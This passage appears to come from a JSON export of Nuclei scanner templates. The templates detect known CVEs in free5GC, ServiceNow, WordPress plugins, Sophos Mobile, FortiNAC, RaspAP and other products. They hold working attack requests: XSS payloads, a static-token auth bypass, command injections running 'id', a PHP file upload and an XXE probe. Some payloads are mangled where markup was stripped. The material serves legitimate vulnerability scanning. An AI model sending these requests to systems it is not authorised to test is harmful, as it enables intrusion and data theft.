'Dapr Dashboard'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ed31baef3a743912069b65ba5acc47646dcaf490915517bdd8e0e7ad7000e63002201f52667a811d396e971bdb076b9e20faf5f2855da5529fd33c7f57c62aca15cb:922c64590222798bb761d5b6d8e72950", "hash": "54bb32802dfda60638a447907038db60", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857c" }, "name": "CVE-2022-38870.yaml", "content": "id: CVE-2022-38870\n\ninfo:\n name: Free5gc 3.2.1 - Information Disclosure\n author: For3stCo1d\n severity: high\n description: |\n Free5gc 3.2.1 is susceptible to information disclosure. 
The web console API accepts requests carrying a static Token header (this template sends Token: admin to /api/subscriber), so an unauthenticated attacker can retrieve subscriber records and potentially modify data or perform other unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive subscriber information (the template matches plmnID and ueId fields in the JSON response).\n remediation: |\n Upgrade free5GC to a release later than 3.2.1 that addresses this issue, and restrict network exposure of the web console so its API is not reachable from untrusted networks.\n reference:\n - https://github.com/free5gc/free5gc/issues/387\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38870\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-38870\n cwe-id: CWE-306\n epss-score: 0.01064\n epss-percentile: 0.83839\n cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: free5gc\n product: free5gc\n shodan-query: http.title:\"free5GC Web Console\"\n tags: cve,cve2022,free5gc,exposure\n\nhttp:\n - raw:\n - |\n GET /api/subscriber HTTP/1.1\n Host: {{Hostname}}\n Token: admin\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"plmnID\":'\n - '\"ueId\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b1bc52241353b36e1a5999a82f529fbbc762b7a9979290d5bbe230ab8d331b1102201bfc8ecd065a544dbcd51dd648a5542814bd55243221a48cceccfba368e17784:922c64590222798bb761d5b6d8e72950", "hash": "a0da0b3603f8cb9e86f8226fa8673846", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857d" }, "name": "CVE-2022-39048.yaml", "content": "id: CVE-2022-39048\n\ninfo:\n name: ServiceNow - Cross-site Scripting\n author: theamanrawat\n severity: medium\n description: |\n An XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. 
To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.\n reference:\n - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892\n - https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39048\n - https://support.servicenow.com/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-39048\n cwe-id: CWE-79\n epss-score: 0.01306\n epss-percentile: 0.8443\n cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: servicenow\n product: servicenow\n shodan-query: http.title:\"ServiceNow\"\n tags: cve,cve2022,xss,servicenow,authenticated\n\nhttp:\n - raw:\n - |\n GET /navpage.do HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /login.do HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}¬_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do\n - |\n GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - 'unwrapped_url = \"javascript:alert(document.domain)//assessment_take2.do\"'\n - 'assessment_list.do'\n condition: and\n\n - type: word\n part: header_3\n words:\n - 'text/html'\n\n - type: status\n part: header_3\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf\n part: body\n group: 1\n regex:\n - 
'name=\"sysparm_ck\" id=\"sysparm_ck\" type=\"hidden\" value=\"(.*?)\"'\n internal: true\n# digest: 4a0a0047304502202102f0fca3b27948107e82e0f1edb665eef04e734cb8223f72f8610fd0a77db7022100f66594372604dbb07eac6b1f2e2eaa0d92054b7cf0f0179d3f3b2278a84506fc:922c64590222798bb761d5b6d8e72950", "hash": "3f123157d1380a466468bbf8aadb29bf", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857e" }, "name": "CVE-2022-3908.yaml", "content": "id: CVE-2022-3908\n\ninfo:\n name: WordPress Helloprint <1.4.7 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser.\n remediation: Fixed in version 1.4.7.\n reference:\n - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505\n - https://wordpress.org/plugins/helloprint/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3908\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3908\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45893\n cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: helloprint\n product: helloprint\n framework: wordpress\n tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=language-translate.php&success=added\"> successfully\")'\n condition: and\n# digest: 490a0046304402207e286204c09dd09c8f88d70cfffd4057fb812e02c12e9f8d003c9cbe275bac56022046153de04d2c4740670bdce031f4191724837e97543756dad26a518e21d528f9:922c64590222798bb761d5b6d8e72950", "hash": "03c35aa16760a4802d809cbe5f57f599", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857f" }, "name": "CVE-2022-39195.yaml", "content": "id: CVE-2022-39195\n\ninfo:\n name: LISTSERV 17 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the \"c\" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html\n - https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L\n - https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39195\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-39195\n cwe-id: CWE-79\n epss-score: 0.00211\n epss-percentile: 0.58386\n cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: lsoft\n product: listserv\n 
shodan-query: http.html:\"LISTSERV\"\n tags: cve,cve2022,xss,listserv,packetstorm,lsoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"LISTSERV\"\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100deb484913d771058cb07f05ff44b039c31713806ae1d7dc76ab917a696784c1602204cc67b35d929a40ecbf2769707cf7c05748309ec523759fa82bd301d0c1751f4:922c64590222798bb761d5b6d8e72950", "hash": "077c43a893646d26d0501f6d9d7c50fb", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308580" }, "name": "CVE-2022-3933.yaml", "content": "id: CVE-2022-3933\n\ninfo:\n name: WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks.\n remediation: Fixed in version 3.9.6.\n reference:\n - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4\n - https://wordpress.org/plugins/essential-real-estate/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3933\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-3933\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: g5theme\n product: essential_real_estate\n framework: wordpress\n tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\")'\n - 'contains(body_2, \"ere_property_gallery\")'\n condition: and\n# digest: 490a0046304402200fe935b7c005247f683b953718e68e4676806de61fba39833160c8503149843f0220541a0e4a4597d27026619f26e233f4d496a8860c45a55e6254286e1975f5b1d1:922c64590222798bb761d5b6d8e72950", "hash": "0971bbdea0553a13210cc9d6bb05df38", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308581" }, "name": "CVE-2022-3934.yaml", "content": "id: 
CVE-2022-3934\n\ninfo:\n name: WordPress FlatPM <3.0.13 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 3.0.13.\n reference:\n - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3934\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-3934\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: mehanoid\n product: flat_pm\n framework: wordpress\n tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")'\n condition: and\n# 
digest: 4a0a00473045022055fba672dad146e93dacb3d50e8711c24f62824a1537c6528e556035e547b531022100c5aff9e112c142313578fb3dfb3657b394dd081730b12452893b6e84b0fa8007:922c64590222798bb761d5b6d8e72950", "hash": "a4d0a72ee8fe8407ef90698cb3cf4127", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308582" }, "name": "CVE-2022-3980.yaml", "content": "id: CVE-2022-3980\n\ninfo:\n name: Sophos Mobile managed on-premises - XML External Entity Injection\n author: dabla\n severity: critical\n description: |\n An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.\n remediation: |\n Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability.\n reference:\n - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3980\n - https://github.com/bigblackhat/oFx\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-3980\n cwe-id: CWE-611\n epss-score: 0.49036\n epss-percentile: 0.97431\n cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sophos\n product: mobile\n shodan-query: http.favicon.hash:-1274798165\n fofa-query: title=\"Sophos Mobile\"\n tags: cve,cve2022,xxe,ssrf,sophos\n\nhttp:\n - raw:\n - |\n @timeout: 50s\n POST /servlets/OmaDsServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: \"application/xml\"\n\n \n %test;]>\n test\n\n redirects: true\n max-redirects: 3\n matchers:\n - type: dsl\n dsl:\n - \"contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')\"\n - \"status_code == 400\"\n - \"len(body) == 0\"\n 
condition: and\n# digest: 490a0046304402203c485611836eec10a1ed541a3725bc35ddc5c20287b97f2ac232d2da614d03c202202fe8d887267e1145fd5315a3ce8588e05e684c7f439e5a7ca6ed2bf669c27137:922c64590222798bb761d5b6d8e72950", "hash": "23ad0617aeb4f2fe81fe241a0d6c3e80", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308583" }, "name": "CVE-2022-3982.yaml", "content": "id: CVE-2022-3982\n\ninfo:\n name: WordPress Booking Calendar <3.2.2 - Arbitrary File Upload\n author: theamanrawat\n severity: critical\n description: |\n WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website.\n remediation: Fixed in 3.2.2.\n reference:\n - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867\n - https://wordpress.org/plugins/booking-calendar/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3982\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-3982\n cwe-id: CWE-434\n epss-score: 0.20211\n epss-percentile: 0.96236\n cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: wpdevart\n product: booking_calendar\n framework: wordpress\n tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n 
--------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"action\"\n\n wpdevart_form_ajax\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"wpdevart_id\"\n\n x\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"wpdevart_nonce\"\n\n {{nonce}}\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"wpdevart_data\"\n\n {\"wpdevart-submit\":\"X\"}\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"wpdevart-submit\"\n\n 1\n --------------------------1cada150a8151a54\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n Content-Type: application/octet-stream\n\n \n\n --------------------------1cada150a8151a54--\n - |\n GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(header_3, \"text/html\")\n - status_code_3 == 200\n - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - var wpdevart.*\"ajaxNonce\":\"(.*?)\"\n internal: true\n# digest: 490a0046304402206624ff96893b99e563ed7e913f0e75dadca668f907e6df1e79304e5ab55b41af02204d1893aa291251d21b535495c2021849fc9174fdc13289d8fb011079eb6dca38:922c64590222798bb761d5b6d8e72950", "hash": "31d2e2343df915742e88421dd7c565b4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308584" }, "name": "CVE-2022-39952.yaml", "content": "id: CVE-2022-39952\n\ninfo:\n name: Fortinet FortiNAC - Arbitrary File Write\n author: dwisiswant0\n severity: critical\n description: |\n Fortinet FortiNAC is susceptible to arbitrary file write. 
An external control of the file name or path can allow an attacker to execute unauthorized code or commands via a specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access and data loss.\n remediation: Upgrade to 9.4.1, 9.2.6, 9.1.8, 7.2.0 or above.\n reference:\n - https://fortiguard.com/psirt/FG-IR-22-300\n - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/\n - https://github.com/horizon3ai/CVE-2022-39952\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39952\n - https://github.com/1f3lse/taiE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-39952\n cwe-id: CWE-668,CWE-73\n epss-score: 0.96445\n epss-percentile: 0.99548\n cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fortinet\n product: fortinac\n shodan-query: title:\"FortiNAC\"\n tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive\nvariables:\n boundaryId: \"{{hex_encode(rand_text_alphanumeric(16))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/configWizard/keyUpload.jsp\"\n\n body: |\n --{{boundaryId}}\n Content-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n {{randstr}}\n --{{boundaryId}}--\n\n headers:\n Content-Type: \"multipart/form-data; boundary={{boundaryId}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"zipUploadSuccess\"\n - \"SuccessfulUpload\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402203cea582616645262451f278883a52ba23466fd71d17efc23fbe8aa5ee2a16c6a0220761185b2c6e66b8eb362c33c1f84a4517c8a9c07670e4e28002fe0ee4767c1ad:922c64590222798bb761d5b6d8e72950", "hash": "a09ef2aee997d7d4f42e432c7f5df826", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308585" }, "name": "CVE-2022-39960.yaml", "content": "id: CVE-2022-39960\n\ninfo:\n name: Jira Netic Group Export <1.0.3 - Missing Authorization\n author: For3stCo1d\n severity: medium\n description: |\n Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive data.\n remediation: |\n Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue.\n reference:\n - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e\n - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39960\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-39960\n cwe-id: CWE-862\n epss-score: 0.21326\n epss-percentile: 0.96012\n cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: netic\n product: group_export\n framework: jira\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2022,atlassian,jira,netic,unauth\n\nhttp:\n - raw:\n - |\n POST 
/plugins/servlet/groupexportforjira/admin/json HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n groupexport_searchstring=&groupexport_download=true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"jiraGroupObjects\"'\n - '\"groupName\"'\n condition: and\n\n - type: word\n part: header\n words:\n - \"attachment\"\n - \"jira-group-export\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e48f19893d9a16ba855d6f9730af410be8edc4eab9b16ef74fe2b8efe0053ec70220188c3998530c97f55e5c698dfd34fd5a9db1a22759017498b1d094525c774be3:922c64590222798bb761d5b6d8e72950", "hash": "ac238732c333abacacc38b3499afe4e3", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308586" }, "name": "CVE-2022-39986.yaml", "content": "id: CVE-2022-39986\n\ninfo:\n name: RaspAP 2.8.7 - Unauthenticated Command Injection\n author: DhiyaneshDK\n severity: critical\n description: |\n A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-39986\n - https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2\n - http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html\n - https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php\n classification:\n cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-39986\n cwe-id: CWE-77\n epss-score: 0.87977\n epss-percentile: 0.98588\n cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: raspap\n product: raspap\n shodan-query: http.favicon.hash:-1465760059\n tags: cve,cve2022,packetstorm,raspap,rce\n\nhttp:\n - raw:\n - |\n POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n cfg_id=;id;#\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d4276486bf740d5acd36f59842a4bb0b0c269c2f35c5b44b7636f342e3f67cea02204698566d89e3bfcb3a4f81b02a07c2ec2552a2b2c88e067bb333d25f7a346cf6:922c64590222798bb761d5b6d8e72950", "hash": "c7d60d4da3854b2b9a165e6469fa2925", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308587" }, "name": "CVE-2022-40022.yaml", "content": "id: CVE-2022-40022\n\ninfo:\n name: Symmetricom SyncServer Unauthenticated - Remote Command Execution\n author: DhiyaneshDK\n severity: critical\n description: |\n Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.\n remediation: |\n Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40022\n - 
https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB\n - https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url=\n - https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-40022\n cwe-id: CWE-77\n epss-score: 0.82869\n epss-percentile: 0.98341\n cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: microchip\n product: syncserver_s650_firmware\n shodan-query: html:\"Symmetricom SyncServer\"\n tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip\n\nhttp:\n - raw:\n - |\n POST /controller/ping.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}/controller/ping.php\n\n currentTab=ping&refreshMode=ðDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n part: body\n regex:\n - \"uid=([0-9(a-z)]+)\"\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100aa89454b284e35f82c58b79db719d9270edf456761c8aa7bded1254e7a8fd8fb022100a95aa00978443217fc6d8c9d178a21856ac5ac6e5aa0dcd44bcfb2ce9448c58d:922c64590222798bb761d5b6d8e72950", "hash": "ce9288ee6ed1703d55fb3dad9f622de3", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308588" }, "name": "CVE-2022-40032.yaml", "content": "id: CVE-2022-40032\n\ninfo:\n name: Simple Task Managing System v1.0 - SQL 